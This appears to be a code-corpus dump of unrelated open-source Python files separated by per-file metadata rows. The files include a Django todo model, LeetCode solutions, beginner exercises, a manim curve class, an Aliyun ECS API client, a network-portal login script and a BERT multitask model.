                "MERGE (softVersion)-[r:ON]->(host) " \
                "ON CREATE SET r.start = datetime(theTime), r.end = datetime(theTime) " \
                "ON MATCH SET r.end = datetime(theTime)"

        params = {'path': path}
        self._run_query(query, **params)
# location.py (jonasjucker/wildlife-telegram, MIT)
import time
from datetime import date, datetime
from astral import LocationInfo
from astral.sun import sun


class CamLocation:
    def __init__(self, lat, lon, info, country, timezone):
        self.info = LocationInfo(info, country, timezone, lat, lon)

    def is_night(self):
        s = sun(self.info.observer, date=date.today(), tzinfo=self.info.timezone)
        sunrise = s["sunrise"].timestamp()
        sunset = s["sunset"].timestamp()
        time_now = datetime.now().timestamp()

        if time_now > sunrise and time_now < sunset:
            return False
        else:
            return True
# Python/problem1150.py (1050669722/LeetCode-Answers, MIT)
from typing import List
from collections import Counter


# class Solution:
#     def isMajorityElement(self, nums: List[int], target: int) -> bool:
#         d = Counter(nums)
#         return d[target] > len(nums)//2


# class Solution:
#     def isMajorityElement(self, nums: List[int], target: int) -> bool:
#         ans = 0
#         for num in nums:
#             if num == target:
#                 ans += 1
#         return ans > len(target)//2


class Solution:
    def isMajorityElement(self, nums: List[int], target: int) -> bool:
        if not nums:
            return False
        if len(nums) == 1:
            return nums[0] == target

        p, q = 0, len(nums) - 1
        while p < q:
            if nums[p] > target:
                return False
            elif nums[p] < target:
                p += 1
            if nums[q] < target:
                return False
            elif nums[q] > target:
                q -= 1
            if nums[p] == nums[q] == target:
                return q - p + 1 > len(nums) // 2
# todo/models.py (zyayoung/share-todo, MIT)
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone


class Todo(models.Model):
    time_add = models.DateTimeField(auto_now_add=True)
    title = models.CharField(max_length=64)
    detail = models.TextField(blank=True)
    deadline = models.DateTimeField(blank=True)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    done = models.BooleanField(default=False)

    def __str__(self):
        return self.title

    def seconds_left(self):
        return (self.deadline - timezone.now()).total_seconds()

    def state(self):
        if self.done:
            return 'Done'
        elif self.seconds_left() > 0:
            return 'Todo'
        else:
            return 'Exceeded'

    class Meta:
        ordering = ['deadline']
# dev-template/src/mysql_connect_sample.py (arrowkato/pytest-CircleiCI, MIT)
import mysql.connector
from mysql.connector import errorcode
config = {
'user': 'user',
'password': 'password',
'host': 'mysql_container',
'database': 'sample_db',
'port': '3306',
}
if __name__ == "__main__":
try:
conn = mysql.connector.connect(**config)
cursor = conn.cursor()
cursor.execute('select * from users')
for row in cursor.fetchall():
            print("name: " + str(row[0]) + " time_zone_id: " + str(row[1]))
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
else:
conn.close()
| 28.931034 | 76 | 0.587604 | 99 | 839 | 4.79798 | 0.575758 | 0.117895 | 0.071579 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009885 | 0.27652 | 839 | 28 | 77 | 29.964286 | 0.772652 | 0 | 0 | 0.153846 | 0 | 0 | 0.220501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.076923 | 0 | 0.076923 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e677b427e6603c8fe21acf94f00727cd3ed74b7a | 920 | py | Python | Mundo 1/ex011.py | viniciusbonito/CeV-Python-Exercicios | 6182421332f6f0c0a567c3e125fdc05736fa6281 | [
"MIT"
] | null | null | null | Mundo 1/ex011.py | viniciusbonito/CeV-Python-Exercicios | 6182421332f6f0c0a567c3e125fdc05736fa6281 | [
"MIT"
] | null | null | null | Mundo 1/ex011.py | viniciusbonito/CeV-Python-Exercicios | 6182421332f6f0c0a567c3e125fdc05736fa6281 | [
"MIT"
] | null | null | null | # criar um programa que pergunte as dimensões de uma parede, calcule sua área e informe quantos litros de tinta
# seriam necessários para a pintura, após perguntar o rendimento da tinta informado na lata
print('=' * 40)
print('{:^40}'.format('Assistente de pintura'))
print('=' * 40)
altura = float(input('Informe a altura da parede em metros: '))
largura = float(input('Informe a largura da parede em metros: '))
area = altura * largura
print('\nA área total da parede é de {:.2f}m²'.format(area))
litros = float(input('\nQuantos litros contém a lata de tinta escolhida? '))
rendlata = float(input('Qual o rendimento em metros informado na lata? '))
rendlitro = rendlata / litros
print('\nSe a lata possui {:.2f}L e rende {:.2f}m²'.format(litros, rendlata))
print('então o rendimento por litro é de {:.2f}m²'.format(rendlitro))
print('\nSerão necessário {:.2f}L para pintar toda a parede'.format(area / rendlitro)) | 46 | 111 | 0.723913 | 142 | 920 | 4.690141 | 0.443662 | 0.06006 | 0.045045 | 0.054054 | 0.039039 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017834 | 0.146739 | 920 | 20 | 112 | 46 | 0.830573 | 0.216304 | 0 | 0.153846 | 0 | 0 | 0.527121 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.538462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
e677b75c2a6dcc29dc727e2cdc804229c99df35d | 591 | py | Python | Python/Mundo 3/ex088.py | henrique-tavares/Coisas | f740518b1bedec5b0ea8c12ae07a2cac21eb51ae | [
"MIT"
] | 1 | 2020-02-07T20:39:26.000Z | 2020-02-07T20:39:26.000Z | Python/Mundo 3/ex088.py | neptune076/Coisas | 85c064cc0e134465aaf6ef41acf747d47f108fc9 | [
"MIT"
] | null | null | null | Python/Mundo 3/ex088.py | neptune076/Coisas | 85c064cc0e134465aaf6ef41acf747d47f108fc9 | [
"MIT"
] | null | null | null | from random import sample
from time import sleep
jogos = list()
print('-' * 20)
print(f'{"MEGA SENA":^20}')
print('-' * 20)
while True:
    n = int(input("\nQuantos jogos você quer que eu sorteie? "))
if (n > 0):
break
print('\n[ERRO] Valor fora do intervalo')
print()
print('-=' * 3, end=' ')
print(f'SORTEANDO {n} JOGOS', end=' ')
print('-=' * 3)
for i in range(n):
jogos.append(sample(range(1,61), 6))
sleep(0.6)
print(f'Jogo {i+1}: {jogos[i]}')
print('-=' * 5, end=' ')
print('< BOA SORTE >', end=' ')
print('-=' * 3, end='\n\n') | 17.909091 | 63 | 0.527919 | 88 | 591 | 3.545455 | 0.534091 | 0.102564 | 0.057692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040089 | 0.240271 | 591 | 33 | 64 | 17.909091 | 0.654788 | 0 | 0 | 0.090909 | 0 | 0 | 0.273649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.545455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
e678937ffa958feedad60c6818f9966146fc7fd7 | 229 | py | Python | tests/list/list03.py | ktok07b6/polyphony | 657c5c7440520db6b4985970bd50547407693ac4 | [
"MIT"
] | 83 | 2015-11-30T09:59:13.000Z | 2021-08-03T09:12:28.000Z | tests/list/list03.py | jesseclin/polyphony | 657c5c7440520db6b4985970bd50547407693ac4 | [
"MIT"
] | 4 | 2017-02-10T01:43:11.000Z | 2020-07-14T03:52:25.000Z | tests/list/list03.py | jesseclin/polyphony | 657c5c7440520db6b4985970bd50547407693ac4 | [
"MIT"
] | 11 | 2016-11-18T14:39:15.000Z | 2021-02-23T10:05:20.000Z | from polyphony import testbench
def list03(x, y, z):
a = [1, 2, 3]
r0 = x
r1 = y
a[r0] = a[r1] + z
return a[r0]
@testbench
def test():
assert 4 == list03(0, 1 ,2)
assert 5 == list03(2, 1 ,3)
test()
| 14.3125 | 31 | 0.515284 | 41 | 229 | 2.878049 | 0.512195 | 0.20339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141026 | 0.318777 | 229 | 15 | 32 | 15.266667 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e67abeee75de516885fc3f200a8feafafe7fd320 | 2,313 | py | Python | manimlib/mobject/functions.py | parmentelat/manim | f05f94fbf51c70591bed3092587a5db0de439738 | [
"MIT"
] | 1 | 2021-02-04T12:54:36.000Z | 2021-02-04T12:54:36.000Z | manimlib/mobject/functions.py | parmentelat/manim | f05f94fbf51c70591bed3092587a5db0de439738 | [
"MIT"
] | null | null | null | manimlib/mobject/functions.py | parmentelat/manim | f05f94fbf51c70591bed3092587a5db0de439738 | [
"MIT"
] | null | null | null | from manimlib.constants import *
from manimlib.mobject.types.vectorized_mobject import VMobject
from manimlib.utils.config_ops import digest_config
from manimlib.utils.space_ops import get_norm
import numpy as np
class ParametricCurve(VMobject):
CONFIG = {
"t_range": [0, 1, 0.1],
"min_samples": 10,
"epsilon": 1e-8,
# TODO, automatically figure out discontinuities
"discontinuities": [],
"smoothing": True,
}
def __init__(self, t_func, t_range=None, **kwargs):
digest_config(self, kwargs)
if t_range is not None:
self.t_range[:len(t_range)] = t_range
# To be backward compatible with all the scenes specifying t_min, t_max, step_size
self.t_range = [
kwargs.get("t_min", self.t_range[0]),
kwargs.get("t_max", self.t_range[1]),
kwargs.get("step_size", self.t_range[2]),
]
self.t_func = t_func
VMobject.__init__(self, **kwargs)
def get_point_from_function(self, t):
return self.t_func(t)
def init_points(self):
t_min, t_max, step = self.t_range
jumps = np.array(self.discontinuities)
jumps = jumps[(jumps > t_min) & (jumps < t_max)]
boundary_times = [t_min, t_max, *(jumps - self.epsilon), *(jumps + self.epsilon)]
boundary_times.sort()
for t1, t2 in zip(boundary_times[0::2], boundary_times[1::2]):
t_range = [*np.arange(t1, t2, step), t2]
points = np.array([self.t_func(t) for t in t_range])
self.start_new_path(points[0])
self.add_points_as_corners(points[1:])
if self.smoothing:
self.make_smooth()
return self
class FunctionGraph(ParametricCurve):
CONFIG = {
"color": YELLOW,
"x_range": [-8, 8, 0.25],
}
def __init__(self, function, x_range=None, **kwargs):
digest_config(self, kwargs)
self.function = function
if x_range is not None:
self.x_range[:len(x_range)] = x_range
def parametric_function(t):
return [t, function(t), 0]
super().__init__(parametric_function, self.x_range, **kwargs)
def get_function(self):
return self.function
def get_point_from_function(self, x):
return self.t_func(x)
| 31.684932 | 90 | 0.609166 | 313 | 2,313 | 4.239617 | 0.28115 | 0.058779 | 0.045215 | 0.030143 | 0.165787 | 0.096458 | 0.055765 | 0 | 0 | 0 | 0 | 0.016598 | 0.270644 | 2,313 | 72 | 91 | 32.125 | 0.770006 | 0.054907 | 0 | 0.071429 | 0 | 0 | 0.036647 | 0 | 0 | 0 | 0 | 0.013889 | 0 | 1 | 0.125 | false | 0 | 0.071429 | 0.071429 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e67af792ae036b2a2bc22a1b166e10db5dcc3d7e | 9,704 | py | Python | lib/ecsmate/ecs.py | doudoudzj/ecsmate | dda508a64ef9d6979dcc83377bb007d2a0acec30 | [
"Apache-2.0"
] | null | null | null | lib/ecsmate/ecs.py | doudoudzj/ecsmate | dda508a64ef9d6979dcc83377bb007d2a0acec30 | [
"Apache-2.0"
] | null | null | null | lib/ecsmate/ecs.py | doudoudzj/ecsmate | dda508a64ef9d6979dcc83377bb007d2a0acec30 | [
"Apache-2.0"
] | null | null | null | #-*- coding: utf-8 -*-
#
# Copyright (c) 2012, ECSMate development team
# All rights reserved.
#
# ECSMate is distributed under the terms of the (new) BSD License.
# The full license can be found in 'LICENSE.txt'.
"""ECS SDK
"""
import time
import hmac
import base64
import hashlib
import urllib
import json
import inspect
from random import random
class ECS(object):
def __init__(self, AccessKeyID, AccessKeySecret, gateway='https://ecs.aliyuncs.com'):
self.AccessKeyID = AccessKeyID
self.AccessKeySecret = AccessKeySecret
self.gateway = gateway
@classmethod
def _urlencode(self, string):
return urllib.quote(string, '~')
def _sign(self, params):
paramstrings = []
for k, v in sorted(params.items()):
paramstrings.append('%s=%s' % (ECS._urlencode(k), ECS._urlencode(v)))
datastrings = [
ECS._urlencode('GET'),
ECS._urlencode('/'),
ECS._urlencode('&'.join(paramstrings)),
]
datastring = '&'.join(datastrings)
signature = hmac.new(self.AccessKeySecret+'&', datastring, hashlib.sha1).digest()
return base64.b64encode(signature)
def _http_get(self, params):
url = self.gateway + '/?'
sysparams = {
'Format': 'JSON',
'Version': '2012-09-13',
'AccessKeyID': self.AccessKeyID,
'SignatureMethod': 'HMAC-SHA1',
'Timestamp': time.strftime('%Y-%m-%dT%XZ'),
'SignatureVersion': '1.0',
'SignatureNonce': str(random()).replace('0.', ''),
}
params.update(sysparams)
params['Signature'] = self._sign(params)
params = urllib.urlencode(params)
url += params
f = urllib.urlopen(url)
data = f.read()
f.close()
return json.loads(data)
def _parse_response(self, apiname, response):
if response.has_key('Error'):
respdata = response['Error']
reqid = respdata['RequestID']
del respdata['RequestID']
return [False, respdata, reqid]
else:
respdata = response[apiname+'Response']
return [True, respdata[apiname+'Result'], respdata['ResponseMetadata']['RequestID']]
def _make_params(self, params):
params = dict((k, str(v)) for k, v in params.items() if k != 'self' and v != None)
params['Action'] = inspect.stack()[1][3]
return params
def _execute(self, params):
response = self._http_get(params)
return self._parse_response(params['Action'], response)
def CreateInstance(self, RegionCode, DiskSize, InstanceType, GroupCode, ImageCode,
MaxBandwidthIn=None, MaxBandwidthOut=None, InstanceName=None, HostName=None,
Password=None, ZoneCode=None):
params = self._make_params(locals())
return self._execute(params)
def StartInstance(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def StopInstance(self, InstanceName, ForceStop=None):
params = self._make_params(locals())
return self._execute(params)
def RebootInstance(self, InstanceName, ForceStop=None):
params = self._make_params(locals())
return self._execute(params)
def ResetInstance(self, InstanceName, ImageCode=None, DiskType=None):
params = self._make_params(locals())
return self._execute(params)
def ResetPassword(self, InstanceName, NewPassword=None):
params = self._make_params(locals())
return self._execute(params)
def DeleteInstance(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def DescribeInstanceStatus(self, RegionCode=None, ZoneCode=None, PageNumber=None, PageSize=None):
params = self._make_params(locals())
return self._execute(params)
def DescribeInstanceAttribute(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def ModifyInstanceAttribute(self, InstanceName, InstanceType):
params = self._make_params(locals())
return self._execute(params)
def ModifyBandwidth(self, InstanceName, MaxBandwidthOut, MaxBandwidthIn):
params = self._make_params(locals())
return self._execute(params)
def ModifyHostName(self, InstanceName, HostName):
params = self._make_params(locals())
return self._execute(params)
def CreateDisk(self, InstanceName, Size, SnapshotCode=None):
params = self._make_params(locals())
return self._execute(params)
def DeleteDisk(self, InstanceName, DiskCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeDisks(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def DescribeImages(self, RegionCode=None, PageNumber=None, PageSize=None):
params = self._make_params(locals())
return self._execute(params)
def AllocateAddress(self, InstanceName):
params = self._make_params(locals())
return self._execute(params)
def ReleaseAddress(self, PublicIpAddress):
params = self._make_params(locals())
return self._execute(params)
def CreateSecurityGroup(self, GroupCode, RegionCode, Description):
params = self._make_params(locals())
return self._execute(params)
def AuthorizeSecurityGroup(self, GroupCode, RegionCode, IpProtocol, PortRange,
SourceGroupCode=None, SourceCidrIp=None, Policy=None, NicType=None, Priority=None):
params = self._make_params(locals())
return self._execute(params)
def DescribeSecurityGroupAttribute(self, GroupCode, RegionCode, NicType=None):
params = self._make_params(locals())
return self._execute(params)
def DescribeSecurityGroups(self, RegionCode, PageNumber=None, PageSize=None):
params = self._make_params(locals())
return self._execute(params)
def ModifySecurityGroupAttribute(self, RegionCode, GroupCode, Adjust):
params = self._make_params(locals())
return self._execute(params)
def RevokeSecurityGroup(self, GroupCode, RegionCode, IpProtocol, PortRange,
SourceGroupCode=None, SourceCidrIp=None, Policy=None, NicType=None):
params = self._make_params(locals())
return self._execute(params)
def DeleteSecurityGroup(self, GroupCode, RegionCode):
params = self._make_params(locals())
return self._execute(params)
def CreateSnapshot(self, InstanceName, DiskCode):
params = self._make_params(locals())
return self._execute(params)
def DeleteSnapshot(self, DiskCode, InstanceName, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def CancelSnapshotRequest(self, InstanceName, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeSnapshots(self, InstanceName, DiskCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeSnapshotAttribute(self, RegionCode, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def RollbackSnapshot(self, InstanceName, DiskCode, SnapshotCode):
params = self._make_params(locals())
return self._execute(params)
def DescribeRegions(self):
params = self._make_params(locals())
return self._execute(params)
def DescribeZones(self, RegionCode):
params = self._make_params(locals())
return self._execute(params)
if __name__ == '__main__':
import pprint
pp = pprint.PrettyPrinter(indent=4)
AccessKeyID = ''
AccessKeySecret = ''
ecs = ECS(AccessKeyID, AccessKeySecret)
if 0:
print '## Regions\n'
regions = ecs.DescribeRegions()[1]
pp.pprint(regions)
print
for region in regions['Regions']:
print '## Zones in %s\n' % region['RegionCode']
zones = ecs.DescribeZones(region['RegionCode'])
if not zones[0]:
pp.pprint(zones)
continue
zones = zones[1]
pp.pprint(zones)
print
for zone in zones['Zones']:
print '## Instances in %s\n' % zone['ZoneCode']
instances = ecs.DescribeInstanceStatus(region['RegionCode'], zone['ZoneCode'])[1]
pp.pprint(instances)
print
print
#pp.pprint(ecs.DescribeInstanceStatus(PageSize=10, PageNumber=1))
#pp.pprint(ecs.DescribeInstanceStatus('cn-hangzhou-dg-a01', 'cn-hangzhou-dg101-a'))
#pp.pprint(ecs.StartInstance('AY1209220917063704221'))
#pp.pprint(ecs.StopInstance('AY1209220917063704221'))
#pp.pprint(ecs.RebootInstance('AY1209220917063704221'))
#pp.pprint(ecs.DescribeInstanceAttribute('AY1209220917063704221'))
#pp.pprint(ecs.DescribeImages(PageSize=10, PageNumber=9))
#pp.pprint(ecs.DescribeDisks('AY1209220917063704221'))
#pp.pprint(ecs.DescribeSnapshots('AY1209220917063704221', '1006-60002839'))
| 36.344569 | 102 | 0.622424 | 941 | 9,704 | 6.27949 | 0.227418 | 0.057539 | 0.078186 | 0.111694 | 0.393975 | 0.393975 | 0.393975 | 0.393975 | 0.393975 | 0.393975 | 0 | 0.023729 | 0.266076 | 9,704 | 266 | 103 | 36.481203 | 0.805953 | 0.077597 | 0 | 0.375 | 0 | 0 | 0.041941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.010417 | 0.046875 | null | null | 0.067708 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e68358c694510e180fb49e743ec559c977aea7b6 | 1,467 | py | Python | src/HandNetwork.py | xausky/hand-network | e885003c5bb9157cd06dc3ea3aabddbb7162a0ab | [
"MIT"
] | 2 | 2017-04-18T03:31:06.000Z | 2017-06-08T10:27:59.000Z | src/HandNetwork.py | xausky/hand-network | e885003c5bb9157cd06dc3ea3aabddbb7162a0ab | [
"MIT"
] | null | null | null | src/HandNetwork.py | xausky/hand-network | e885003c5bb9157cd06dc3ea3aabddbb7162a0ab | [
"MIT"
] | null | null | null | #!/usr/bin/python3
#-*- coding: utf-8 -*-
import urllib.parse
import json
import base64
import requests
import logging
class Network():
LOGIN_URL = 'http://192.168.211.101/portal/pws?t=li'
BEAT_URL = 'http://192.168.211.101/portal/page/doHeartBeat.jsp'
COMMON_HERADERS = {
'Accept-Language': 'en-US',
'Accept': 'text/html'
}
def __init__(self, username, password):
b64Password = base64.b64encode(bytes(password,'utf8'))
self.data = {'userName': username, 'userPwd': b64Password}
def login(self):
logging.info('login:%s'%(self.data))
response = requests.post(Network.LOGIN_URL, data=self.data,
headers=Network.COMMON_HERADERS, timeout=3)
responseText = base64.b64decode(response.text + '==')
responseJson = urllib.parse.unquote(responseText.decode('utf8'))
jsonDict = json.loads(responseJson)
heartBeatCyc = jsonDict.get('heartBeatCyc')
if heartBeatCyc == None:
raise BaseException(responseJson)
logging.info('login seccuss: %s'%(responseJson))
self.heartBeatCyc = int(heartBeatCyc)
self.serialNo = jsonDict.get('serialNo')
return self.heartBeatCyc
def beat(self):
response = requests.post(Network.BEAT_URL, data={'serialNo': self.serialNo},
headers=Network.COMMON_HERADERS, timeout=3)
        if response.text.find('v_failedTimes') == -1:
raise BaseException(response.text)
| 36.675 | 84 | 0.657805 | 166 | 1,467 | 5.740964 | 0.46988 | 0.044071 | 0.03148 | 0.027282 | 0.128017 | 0.128017 | 0.052466 | 0 | 0 | 0 | 0 | 0.03856 | 0.204499 | 1,467 | 39 | 85 | 37.615385 | 0.778063 | 0.025903 | 0 | 0.058824 | 0 | 0 | 0.149965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088235 | false | 0.088235 | 0.147059 | 0 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e6848af64f5fa82bd5d7d5132ff08186219ab513 | 15,634 | py | Python | bert_multitask_learning/model_fn.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | bert_multitask_learning/model_fn.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | bert_multitask_learning/model_fn.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: source_nbs/13_model_fn.ipynb (unless otherwise specified).
__all__ = ['variable_summaries', 'filter_loss', 'BertMultiTaskBody', 'BertMultiTaskTop', 'BertMultiTask']
# Cell
from typing import Dict, Tuple
from inspect import signature
import tensorflow as tf
import transformers
from .modeling import MultiModalBertModel
from .params import BaseParams
from .top import (Classification, MultiLabelClassification, PreTrain,
Seq2Seq, SequenceLabel, MaskLM)
from .utils import get_embedding_table_from_model, get_transformer_main_model
def variable_summaries(var, name):
"""Attach a lot of summaries to a Tensor (for TensorBoard visualization)."""
with tf.compat.v1.name_scope(name):
mean = tf.reduce_mean(input_tensor=var)
tf.compat.v1.summary.scalar('mean', mean)
with tf.compat.v1.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(
input_tensor=tf.square(var - mean)))
tf.compat.v1.summary.scalar('stddev', stddev)
tf.compat.v1.summary.scalar('max', tf.reduce_max(input_tensor=var))
tf.compat.v1.summary.scalar('min', tf.reduce_min(input_tensor=var))
tf.compat.v1.summary.histogram('histogram', var)
@tf.function
def filter_loss(loss, features, problem):
if tf.reduce_mean(input_tensor=features['%s_loss_multiplier' % problem]) == 0:
return_loss = 0.0
else:
return_loss = loss
return return_loss
class BertMultiTaskBody(tf.keras.Model):
"""Model to extract bert features and dispatch corresponding rows to each problem_chunk.
for each problem chunk, we extract corresponding features
and hidden features for that problem. The reason behind this
is to save computation for downstream processing.
For example, we have a batch of two instances and they're from
problem a and b respectively:
Input:
[{'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0},
{'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}]
Output:
{
'a': {'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0}
'b': {'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}
}
"""
def __init__(self, params: BaseParams, name='BertMultiTaskBody'):
super(BertMultiTaskBody, self).__init__(name=name)
self.params = params
self.bert = MultiModalBertModel(params=self.params)
if self.params.custom_pooled_hidden_size:
self.custom_pooled_layer = tf.keras.layers.Dense(
self.params.custom_pooled_hidden_size, activation=tf.keras.activations.selu)
else:
self.custom_pooled_layer = None
@tf.function
def get_features_for_problem(self, features, hidden_feature, problem, mode):
# get features with ind == 1
if mode == tf.estimator.ModeKeys.PREDICT:
feature_this_round = features
hidden_feature_this_round = hidden_feature
else:
multiplier_name = '%s_loss_multiplier' % problem
record_ind = tf.where(tf.cast(
tf.squeeze(features[multiplier_name]), tf.bool))
hidden_feature_this_round = {}
for hidden_feature_name in hidden_feature:
if hidden_feature_name != 'embed_table':
hidden_feature_this_round[hidden_feature_name] = tf.squeeze(tf.gather(
hidden_feature[hidden_feature_name], record_ind, axis=0
), axis=1)
hidden_feature_this_round[hidden_feature_name].set_shape(
hidden_feature[hidden_feature_name].shape.as_list())
else:
hidden_feature_this_round[hidden_feature_name] = hidden_feature[hidden_feature_name]
feature_this_round = {}
for features_name in features:
feature_this_round[features_name] = tf.gather_nd(
features[features_name],
record_ind)
return feature_this_round, hidden_feature_this_round
def call(self, inputs: Dict[str, tf.Tensor],
mode: str) -> Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]]:
_ = self.bert(inputs, mode == tf.estimator.ModeKeys.TRAIN)
# extract bert hidden features
inputs['model_input_mask'] = self.bert.get_input_mask()
inputs['model_token_type_ids'] = self.bert.get_token_type_ids()
hidden_feature = {}
for logit_type in ['seq', 'pooled', 'all', 'embed', 'embed_table']:
if logit_type == 'seq':
# tensor, [batch_size, seq_length, hidden_size]
hidden_feature[logit_type] = self.bert.get_sequence_output()
elif logit_type == 'pooled':
# tensor, [batch_size, hidden_size]
hidden_feature[logit_type] = self.bert.get_pooled_output()
if self.custom_pooled_layer:
hidden_feature[logit_type] = self.custom_pooled_layer(
hidden_feature[logit_type])
elif logit_type == 'all':
# list, num_hidden_layers * [batch_size, seq_length, hidden_size]
hidden_feature[logit_type] = self.bert.get_all_encoder_layers()
elif logit_type == 'embed':
# for res connection
hidden_feature[logit_type] = self.bert.get_embedding_output()
elif logit_type == 'embed_table':
hidden_feature[logit_type] = self.bert.get_embedding_table()
# for each problem chunk, we extract corresponding features
# and hidden features for that problem. The reason behind this
# is to save computation for downstream processing.
# For example, we have a batch of two instances and they're from
# problem a and b respectively:
# Input:
# [{'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0},
# {'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}]
# Output:
# {
# 'a': {'input_ids': [1,2,3], 'a_loss_multiplier': 1, 'b_loss_multiplier': 0}
# 'b': {'input_ids': [4,5,6], 'a_loss_multiplier': 0, 'b_loss_multiplier': 1}
# }
features = inputs
return_feature = {}
return_hidden_feature = {}
for problem_dict in self.params.run_problem_list:
for problem in problem_dict:
if self.params.task_transformer:
# hidden_feature = task_tranformer_hidden_feature[problem]
raise NotImplementedError
if len(self.params.run_problem_list) > 1:
feature_this_round, hidden_feature_this_round = self.get_features_for_problem(
features, hidden_feature, problem, mode)
else:
feature_this_round, hidden_feature_this_round = features, hidden_feature
if self.params.label_transfer and self.params.grid_transformer:
raise ValueError(
'Label Transfer and grid transformer cannot be enabled in the same time.'
)
if self.params.grid_transformer:
raise NotImplementedError
return_hidden_feature[problem] = hidden_feature_this_round
return_feature[problem] = feature_this_round
return return_feature, return_hidden_feature
# Cell
class BertMultiTaskTop(tf.keras.Model):
"""Model to create top layer, aka classification layer, for each problem.
"""
def __init__(self, params: BaseParams, name='BertMultiTaskTop', input_embeddings: tf.Tensor = None):
super(BertMultiTaskTop, self).__init__(name=name)
self.params = params
problem_type_layer = {
'seq_tag': SequenceLabel,
'cls': Classification,
'seq2seq_tag': Seq2Seq,
'seq2seq_text': Seq2Seq,
'multi_cls': MultiLabelClassification,
'pretrain': PreTrain,
'masklm': MaskLM
}
problem_type_layer.update(self.params.top_layer)
self.top_layer_dict = {}
for problem_dict in self.params.run_problem_list:
for problem in problem_dict:
problem_type = self.params.problem_type[problem]
# some layers has different signatures, assign inputs accordingly
layer_signature_name = signature(
problem_type_layer[problem_type].__init__).parameters.keys()
inputs_kwargs = {
'params': self.params,
'problem_name': problem
}
